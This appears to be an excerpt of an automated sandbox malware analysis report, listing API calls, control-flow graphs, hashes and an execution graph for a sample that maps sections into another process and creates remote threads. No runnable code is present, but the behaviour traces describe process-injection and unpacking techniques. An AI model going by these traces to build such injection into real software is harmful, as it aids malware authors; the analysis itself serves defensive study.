                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 528 401902-401963 call 4011a4 Sleep call 401426 542 401972-401978 528->542 543 401965-40196d call 401529 528->543 546 40198e 542->546 547 40197f-40198a 542->547 543->542 546->547 548 401991-4019bd call 4011a4 546->548 547->548
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761315277.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_3312.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                    • String ID:
                                                                                    • API String ID: 4152845823-0
                                                                                    • Opcode ID: 038fd76a8208d0ddfff32e2f40036fbca87feb8e69a48f33ff6f35dc682cef07
                                                                                    • Instruction ID: 207861a3759c1b147de2553678edefd9187cc257709d93c52e233f88d5e7a3be
                                                                                    • Opcode Fuzzy Hash: 038fd76a8208d0ddfff32e2f40036fbca87feb8e69a48f33ff6f35dc682cef07
                                                                                    • Instruction Fuzzy Hash: B70169F1208209FBEB009A908D61EBA3668AB05760F700133BA13781F5D57C9A53E76B
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761315277.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_3312.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                    • String ID:
                                                                                    • API String ID: 4152845823-0
                                                                                    • Opcode ID: c88f444a594768d2d4fab485523800559cc166debe3a6fe30cf89bfb996ff5f6
                                                                                    • Instruction ID: 578df434b3d236032839297bc76fd9486bb072801922ad90ba2380d7086ecf03
                                                                                    • Opcode Fuzzy Hash: c88f444a594768d2d4fab485523800559cc166debe3a6fe30cf89bfb996ff5f6
                                                                                    • Instruction Fuzzy Hash: 95F05EB1208209FBEF009F908D61EAA3729AF05710F644137BA52781F5D63CDA53EB1B
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761315277.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_3312.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                    • String ID:
                                                                                    • API String ID: 4152845823-0
                                                                                    • Opcode ID: 45864dc147576a9e119c499a9794f12b744a0bfa5c226a532e69094f16d3b09b
                                                                                    • Instruction ID: b5d34a972f1ec939c421f577379ccf4d396b21f1793fd223155277739043cea6
                                                                                    • Opcode Fuzzy Hash: 45864dc147576a9e119c499a9794f12b744a0bfa5c226a532e69094f16d3b09b
                                                                                    • Instruction Fuzzy Hash: 5AF05EB1218209FBEB009F908D61EBA3629AF05310F644177BA12781F5C63DDA23E75B
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761315277.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_3312.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                    • String ID:
                                                                                    • API String ID: 4152845823-0
                                                                                    • Opcode ID: 14db16c3e861f19ad5dfd30c38be67768c01ca1c8fcdc6992631d9b2414dadb5
                                                                                    • Instruction ID: c277f467d3f9426b8f9a73765fdcab00a649fd51b95b24d53f0d4f33e3e8ae71
                                                                                    • Opcode Fuzzy Hash: 14db16c3e861f19ad5dfd30c38be67768c01ca1c8fcdc6992631d9b2414dadb5
                                                                                    • Instruction Fuzzy Hash: F7F037B1108209FBDF009F94CD51EAA3729AF09310F644577BA12781F5C63DDA12E72B
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761315277.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_3312.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                    • String ID:
                                                                                    • API String ID: 4152845823-0
                                                                                    • Opcode ID: d565b972daf1ea01d692af33d09a01f0ed4f5aa4668cdc6292c3b22aaefac0ec
                                                                                    • Instruction ID: 30c85490bd3e36b3d7497cee73256dee3cb4488b2b17691bada95d8d1bd3f612
                                                                                    • Opcode Fuzzy Hash: d565b972daf1ea01d692af33d09a01f0ed4f5aa4668cdc6292c3b22aaefac0ec
                                                                                    • Instruction Fuzzy Hash: 33F037B1204205FBDF009F94CD91EAE3629AF05310F644173BA12791F5D67DDA12E75B
                                                                                    APIs
                                                                                    • LocalAlloc.KERNELBASE(00000000,00513D6C,00418A52), ref: 004183C8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761335489.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_40b000_3312.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocLocal
                                                                                    • String ID:
                                                                                    • API String ID: 3494564517-0
                                                                                    • Opcode ID: bf7e8b90cc3ff6e39906310c12a02d65c83cdbf560656bc42193d9e9982b9279
                                                                                    • Instruction ID: c2961758425a8787823cb41888b9bba809d6f705acec62bde6717c0d90632542
                                                                                    • Opcode Fuzzy Hash: bf7e8b90cc3ff6e39906310c12a02d65c83cdbf560656bc42193d9e9982b9279
                                                                                    • Instruction Fuzzy Hash: A6B012F0A491009FD7008F54FD64B903FB4F358702F00C065F600C2164EB304908EB10
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761506014.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a0000_3312.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .$GetProcAddress.$l
                                                                                    • API String ID: 0-2784972518
                                                                                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                    • Instruction ID: 950ca7b9e5abbbfde5366c66b5014f758a29023b43122d8a2dbe4e0272f0e847
                                                                                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                    • Instruction Fuzzy Hash: 5B3137B6900609DFEB10DF99C880AAEBBF6FF49324F24504AD441A7311D771EA45CFA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761315277.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_3312.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 18f97d7e3c198c930df0e1e3726df986428e5bed6b78be6737e9bf24f670245c
                                                                                    • Instruction ID: 1fe14f3d08a5ad6b2b8af3127fa4f425e7ffb0c359c280517f11db711c116789
                                                                                    • Opcode Fuzzy Hash: 18f97d7e3c198c930df0e1e3726df986428e5bed6b78be6737e9bf24f670245c
                                                                                    • Instruction Fuzzy Hash: 0A716C32400264DADB28EFBCC6CAE557370FB02F00B550BB6C5812F58ADB75B6198B96
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761888720.000000000082D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_82d000_3312.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                    • Instruction ID: 37c188c7758a7bb730d7eacdf9a99ac3212b6f643a04555ec9e14fd00b4bcd8a
                                                                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                    • Instruction Fuzzy Hash: B6117076340110AFD755DE59EC81EA673EAFB88720B2A8075EA04CB327E675EC41C760
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761315277.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_3312.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 14c91299fc0d5ea6405d973304b2732cfb05cef970dc5b42c380558f1c3c8a50
                                                                                    • Instruction ID: e7a2f1e1f2d18035c496875c0c2bba996cc0d18765e75913e3c7fd8bcbe23822
                                                                                    • Opcode Fuzzy Hash: 14c91299fc0d5ea6405d973304b2732cfb05cef970dc5b42c380558f1c3c8a50
                                                                                    • Instruction Fuzzy Hash: CA11533600420ADFD715EE219A89AA9BB21FB45704B5400BADE562B0C2A2BD7123970B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761315277.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_3312.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5ecd1a4c209d5f5235aa5223a66586c749e58f70271c2d5c11b30b858281451a
                                                                                    • Instruction ID: d9f06ca26037506423ecc87bc330270b3b45d0e2ffab50e6a8e269eb556b0e13
                                                                                    • Opcode Fuzzy Hash: 5ecd1a4c209d5f5235aa5223a66586c749e58f70271c2d5c11b30b858281451a
                                                                                    • Instruction Fuzzy Hash: 7411533640820ADFD715EE21AA89AA6BB31FB45704F5400BBDE562B0C1E2BD7123D74B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761315277.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_3312.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2c29bc3172a4a75054b17bc2abf467eb46d0d52112e2b03bc1234d3f1f3eeaba
                                                                                    • Instruction ID: 8ab6e973ac2bde56534b905b9a6112487ad567182bc04a9cefd4a17b3c0f3d42
                                                                                    • Opcode Fuzzy Hash: 2c29bc3172a4a75054b17bc2abf467eb46d0d52112e2b03bc1234d3f1f3eeaba
                                                                                    • Instruction Fuzzy Hash: A6113636504206CFDB15DF20D9895A8B722FB45704B1400BACE522B0C1E37D7113D70B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761315277.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_3312.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c2fb1fcd810030a7c701492efe6b1583806f24c29ad391e8378491e72e53c4f9
                                                                                    • Instruction ID: 10c1f8c9815bd1bae344db256f26ecf9b321a2c49f9f40fa9571263b21f216dd
                                                                                    • Opcode Fuzzy Hash: c2fb1fcd810030a7c701492efe6b1583806f24c29ad391e8378491e72e53c4f9
                                                                                    • Instruction Fuzzy Hash: 17113636404206CFD715DF10AA895A8B721BB55704B14007ACE521B0C1A3BD6113970B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761315277.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_3312.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ad580f4852e8641318215a16f7c63f70c318642c86c98d9f634171b4294914d4
                                                                                    • Instruction ID: f3401649f1529dc56ca8e0e6371485d35b9042d0b2056da4c8f47593e1f5965b
                                                                                    • Opcode Fuzzy Hash: ad580f4852e8641318215a16f7c63f70c318642c86c98d9f634171b4294914d4
                                                                                    • Instruction Fuzzy Hash: 7701263644420ACFDB1AEF11E9896E8B732FB55704B5401BACE565B0C1E37D6113D70B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761315277.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_3312.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0d17a2e63e4f1915686b689582fba0273351ae16582c8cdc9572b60fe9b5c197
                                                                                    • Instruction ID: ab8b863e00b9434e1dbf8970a3beebb42fa128e0550c32edf730788d57ebd560
                                                                                    • Opcode Fuzzy Hash: 0d17a2e63e4f1915686b689582fba0273351ae16582c8cdc9572b60fe9b5c197
                                                                                    • Instruction Fuzzy Hash: 1001263640434ACFCB16EF11E9895E4BB32BF45708B4801A6CE565B092E3793122D70B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761506014.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a0000_3312.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                    • Instruction ID: 9670c6dc6782615957e8167651f040a8d9d68a0a5bd5790f4f5c73451d1e142f
                                                                                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                    • Instruction Fuzzy Hash: 7E0184766016048FEB21EF64C804BEA33E6FF87315F4544A5D50697242E774AD418F90
                                                                                    APIs
                                                                                    • BuildCommDCBA.KERNEL32(00000000,?), ref: 004185E4
                                                                                    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004185F6
                                                                                    • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00418631
                                                                                    • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041863F
                                                                                    • OpenJobObjectA.KERNEL32(00000000,00000000,0041A388), ref: 0041864E
                                                                                    • BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418660
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761335489.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_40b000_3312.jbxd
                                                                                    Similarity
                                                                                    • API ID: AvailableBackupBuildCalendarCommEnvironmentFreeInfoMemoryNodeNumaObjectOpenSeekStrings
                                                                                    • String ID: -
                                                                                    • API String ID: 2332831159-2547889144
                                                                                    • Opcode ID: aa3f3e16c2b8ad8159801690ebf91fd77c7334dd12e0fb43f0cb842b769be909
                                                                                    • Instruction ID: dc09c9271f7556c4636e283841371480f1d2e1e0c911847624fe203bcff12d0a
                                                                                    • Opcode Fuzzy Hash: aa3f3e16c2b8ad8159801690ebf91fd77c7334dd12e0fb43f0cb842b769be909
                                                                                    • Instruction Fuzzy Hash: D411F931684304BBEB205FA4AD46BEE7F74EB09B12F214129FA04691C1CFB41E819B5F
                                                                                    APIs
                                                                                    • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00418631
                                                                                    • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041863F
                                                                                    • OpenJobObjectA.KERNEL32(00000000,00000000,0041A388), ref: 0041864E
                                                                                    • BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418660
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761335489.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_40b000_3312.jbxd
                                                                                    Similarity
                                                                                    • API ID: AvailableBackupCalendarInfoMemoryNodeNumaObjectOpenSeek
                                                                                    • String ID: -
                                                                                    • API String ID: 1414951042-2547889144
                                                                                    • Opcode ID: 86776cb80feb8b78d01717bac59e27429fa2b5433d03396783db491f30ffd1ff
                                                                                    • Instruction ID: 3dc4560c4a2b73dc85cfe488574194b755ebb29c5387034dd9c2c55cc5f6870b
                                                                                    • Opcode Fuzzy Hash: 86776cb80feb8b78d01717bac59e27429fa2b5433d03396783db491f30ffd1ff
                                                                                    • Instruction Fuzzy Hash: F7F0C231685304ABDB219F94ED56BD97B60EB09B15F214258FA086E1C0CBB41E81DB8A
                                                                                    APIs
                                                                                    • QueryDosDeviceA.KERNEL32(0041A3A4,?,00000000), ref: 004186C7
                                                                                    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004186E2
                                                                                    • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 00418705
                                                                                    • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00418714
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761335489.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_40b000_3312.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                    • String ID:
                                                                                    • API String ID: 2776817195-0
                                                                                    • Opcode ID: 9a4a35854e1a9fccc17e98839e81a7996436b36a760555773b20b47233558da8
                                                                                    • Instruction ID: 169bd11126e9c70372d5ad919650aca72b348e6cd2082656d0e56df02b6a2308
                                                                                    • Opcode Fuzzy Hash: 9a4a35854e1a9fccc17e98839e81a7996436b36a760555773b20b47233558da8
                                                                                    • Instruction Fuzzy Hash: 2F01D8B0A40204ABD720EB64EC55BD97778EB1C301F00407BFA05A72D0DE745E84CB5D

                                                                                    Execution Graph

                                                                                    Execution Coverage:8.2%
                                                                                    Dynamic/Decrypted Code Coverage:17.9%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:156
                                                                                    Total number of Limit Nodes:5
                                                                                    execution_graph 4158 402e42 4161 402e47 4158->4161 4159 402f18 4160 401902 8 API calls 4159->4160 4163 402f4c 4159->4163 4160->4163 4161->4159 4162 4020ea NtQuerySystemInformation 4161->4162 4161->4163 4162->4159 4170 418606 4172 418610 4170->4172 4171 4185c0 SetPriorityClass 4171->4172 4172->4171 4173 41862d GetNumaAvailableMemoryNode SetCalendarInfoW OpenJobObjectA BackupSeek 4172->4173 4174 41866b 4172->4174 4173->4172 4269 40190e 4270 401912 4269->4270 4271 4018b5 4269->4271 4272 401946 Sleep 4270->4272 4273 401961 4272->4273 4274 401529 7 API calls 4273->4274 4275 401972 4273->4275 4274->4275 4175 4014db 4176 40148f 4175->4176 4177 401469 4175->4177 4176->4175 4176->4177 4178 4015d5 NtDuplicateObject 4176->4178 4178->4177 4179 4015f2 NtCreateSection 4178->4179 4180 401672 NtCreateSection 4179->4180 4181 401618 NtMapViewOfSection 4179->4181 4180->4177 4183 40169e 4180->4183 4181->4180 4182 40163b NtMapViewOfSection 4181->4182 4182->4180 4184 401659 4182->4184 4183->4177 4185 4016a8 NtMapViewOfSection 4183->4185 4184->4180 4185->4177 4186 4016cf NtMapViewOfSection 4185->4186 4186->4177 4091 5e003c 4092 5e0049 4091->4092 4104 5e0e0f SetErrorMode SetErrorMode 4092->4104 4097 5e0265 4098 5e02ce VirtualProtect 4097->4098 4100 5e030b 4098->4100 4099 5e0439 VirtualFree 4103 5e04be LoadLibraryA 4099->4103 4100->4099 4102 5e08c7 4103->4102 4105 5e0223 4104->4105 4106 5e0d90 4105->4106 4107 5e0dad 4106->4107 4108 5e0dbb GetPEB 4107->4108 4109 5e0238 VirtualAlloc 4107->4109 4108->4109 4109->4097 4280 401922 4281 401930 4280->4281 4282 401946 Sleep 4281->4282 4283 401961 4282->4283 4284 401529 7 API calls 4283->4284 4285 401972 4283->4285 4284->4285 4110 610082 4111 610091 4110->4111 4114 610822 4111->4114 4115 61083d 4114->4115 4116 610846 CreateToolhelp32Snapshot 4115->4116 4117 610862 Module32First 4115->4117 4116->4115 4116->4117 4118 610871 4117->4118 4119 61009a 4117->4119 4121 6104e1 4118->4121 4122 61050c 4121->4122 4123 610555 4122->4123 4124 61051d VirtualAlloc 4122->4124 4123->4123 4124->4123 4033 418b70 4036 418730 4033->4036 4035 418b75 4037 41873d 4036->4037 4038 418840 7 API calls 4037->4038 4043 418993 4037->4043 4040 4188c5 7 API calls 4038->4040 4039 4189a1 SetCommMask 4039->4043 4041 418971 4040->4041 4042 418965 ObjectPrivilegeAuditAlarmW 4040->4042 4045 418982 4041->4045 4046 41897a WaitForSingleObject 4041->4046 4042->4041 4043->4039 4044 4189b1 GetUserObjectInformationW 4043->4044 4047 4189d2 4043->4047 4044->4043 4045->4043 4046->4045 4048 4189db GetConsoleAliasesLengthW GetComputerNameW GetConsoleAliasExesLengthW GetBinaryType PurgeComm 4047->4048 4049 418a4d 4047->4049 4056 418a2b 4048->4056 4061 4183c0 LocalAlloc 4049->4061 4053 418a52 LoadLibraryA 4062 4183f0 GetModuleHandleW GetProcAddress VirtualProtect 4053->4062 4054 418a9d 4063 418690 4054->4063 4056->4049 4057 418aa2 4058 418ae3 InterlockedCompareExchange 4057->4058 4059 418ac3 MoveFileW 4057->4059 4060 418afd 4057->4060 4058->4057 4059->4057 4060->4035 4061->4053 4062->4054 4064 4186b9 QueryDosDeviceA 4063->4064 4065 4186cd 4063->4065 4064->4065 4074 418590 4065->4074 4068 4186e0 FreeEnvironmentStringsA 4069 4186e8 4068->4069 4077 4185d0 4069->4077 4072 41871a 4072->4057 4073 4186ff HeapCreate GetNumaProcessorNode 4073->4072 4075 4185a1 FatalAppExitA GetModuleHandleA 4074->4075 4076 4185b3 4074->4076 4075->4076 4076->4068 4076->4069 4078 4185ec 4077->4078 4079 4185de BuildCommDCBA 4077->4079 4080 4185f4 FreeEnvironmentStringsA 4078->4080 4082 4185fc 4078->4082 4079->4082 4080->4082 4083 41862d GetNumaAvailableMemoryNode SetCalendarInfoW OpenJobObjectA BackupSeek 4082->4083 4084 41866b 4082->4084 4085 4185c0 4082->4085 4083->4082 4084->4072 4084->4073 4088 418540 4085->4088 4089 41856b 4088->4089 4090 41855c SetPriorityClass 4088->4090 4089->4082 4090->4089 4302 401534 4303 401546 4302->4303 4304 4015d5 NtDuplicateObject 4303->4304 4310 4016f1 4303->4310 4305 4015f2 NtCreateSection 4304->4305 4304->4310 4306 401672 NtCreateSection 4305->4306 4307 401618 NtMapViewOfSection 4305->4307 4309 40169e 4306->4309 4306->4310 4307->4306 4308 40163b NtMapViewOfSection 4307->4308 4308->4306 4311 401659 4308->4311 4309->4310 4312 4016a8 NtMapViewOfSection 4309->4312 4311->4306 4312->4310 4313 4016cf NtMapViewOfSection 4312->4313 4313->4310 4314 5e092b GetPEB 4315 5e0972 4314->4315 4125 402ffa 4126 40313d 4125->4126 4127 403024 4125->4127 4127->4126 4128 4030df RtlCreateUserThread NtTerminateProcess 4127->4128 4128->4126 4129 402ebc 4132 402eb4 4129->4132 4130 402f18 4134 402f4c 4130->4134 4140 401902 4130->4140 4132->4130 4132->4134 4135 4020ea 4132->4135 4136 4020fb 4135->4136 4137 402152 NtQuerySystemInformation 4136->4137 4138 40214e 4136->4138 4139 40216e 4136->4139 4137->4138 4138->4136 4138->4137 4139->4130 4141 401913 4140->4141 4142 401946 Sleep 4141->4142 4143 401961 4142->4143 4145 401972 4143->4145 4146 401529 4143->4146 4145->4134 4147 401539 4146->4147 4148 4015d5 NtDuplicateObject 4147->4148 4157 4016f1 4147->4157 4149 4015f2 NtCreateSection 4148->4149 4148->4157 4150 401672 NtCreateSection 4149->4150 4151 401618 NtMapViewOfSection 4149->4151 4153 40169e 4150->4153 4150->4157 4151->4150 4152 40163b NtMapViewOfSection 4151->4152 4152->4150 4154 401659 4152->4154 4155 4016a8 NtMapViewOfSection 4153->4155 4153->4157 4154->4150 4156 4016cf NtMapViewOfSection 4155->4156 4155->4157 4156->4157 4157->4145 4187 4020fc 4188 402107 4187->4188 4189 402152 NtQuerySystemInformation 4188->4189 4190 40216e 4188->4190 4189->4188

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 418730-418758 2 418760-418767 0->2 3 418794-41879a 2->3 4 418769-418790 2->4 5 41879c-4187a8 3->5 6 4187ae-4187b8 3->6 4->3 5->6 7 4187f3-4187fa 6->7 8 4187ba-4187e9 6->8 7->2 9 418800-418806 7->9 8->7 11 418808-41880e 9->11 12 418810-418816 11->12 13 41881c-418826 11->13 12->13 14 418828 13->14 15 41882a-418831 13->15 14->15 15->11 16 418833-41883a 15->16 17 418840-418963 InterlockedCompareExchange SetFocus ReadConsoleA FindAtomA SearchPathA GetConsoleMode SearchPathW GetDefaultCommConfigA CopyFileExW CreatePipe GetEnvironmentStringsW WriteConsoleOutputA GetModuleFileNameW GetSystemTimeAdjustment 16->17 18 418993-41899f 16->18 22 418971-418978 17->22 23 418965-41896b ObjectPrivilegeAuditAlarmW 17->23 19 4189a1-4189af SetCommMask 18->19 24 4189c1-4189c7 19->24 25 4189b1-4189bb GetUserObjectInformationW 19->25 26 418982-418990 22->26 27 41897a-41897c WaitForSingleObject 22->27 23->22 28 4189d2-4189d9 24->28 29 4189c9-4189d0 24->29 25->24 26->18 27->26 30 4189db-418a47 GetConsoleAliasesLengthW GetComputerNameW GetConsoleAliasExesLengthW GetBinaryType PurgeComm 28->30 31 418a4d-418a5c call 4183c0 28->31 29->19 29->28 30->31 37 418a8d-418a98 LoadLibraryA call 4183f0 31->37 38 418a5e-418a6f 31->38 44 418a9d-418aae call 418690 37->44 39 418a70-418a80 38->39 42 418a82 39->42 43 418a88-418a8b 39->43 42->43 43->37 43->39 48 418ab0-418ab7 44->48 50 418ab9-418ac7 MoveFileW 48->50 51 418acd-418ad3 48->51 50->51 53 418ad5 call 4183e0 51->53 54 418ada-418ae1 51->54 53->54 57 418ae3-418aee InterlockedCompareExchange 54->57 58 418af4-418afb 54->58 57->58 58->48 59 418afd-418b0d 58->59 61 418b10-418b20 59->61 62 418b22 61->62 63 418b29-418b2c 61->63 62->63 63->61 64 418b2e-418b39 63->64 65 418b40-418b45 64->65 66 418b47-418b4d 65->66 67 418b4f-418b55 65->67 66->67 68 418b57-418b64 66->68 67->65 67->68
                                                                                    APIs
                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 0041884B
                                                                                    • SetFocus.USER32(00000000), ref: 00418854
                                                                                    • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041885F
                                                                                    • FindAtomA.KERNEL32(00000000), ref: 00418866
                                                                                    • SearchPathA.KERNEL32(0041A3EC,0041A3D0,0041A3C8,00000000,?,?), ref: 0041888A
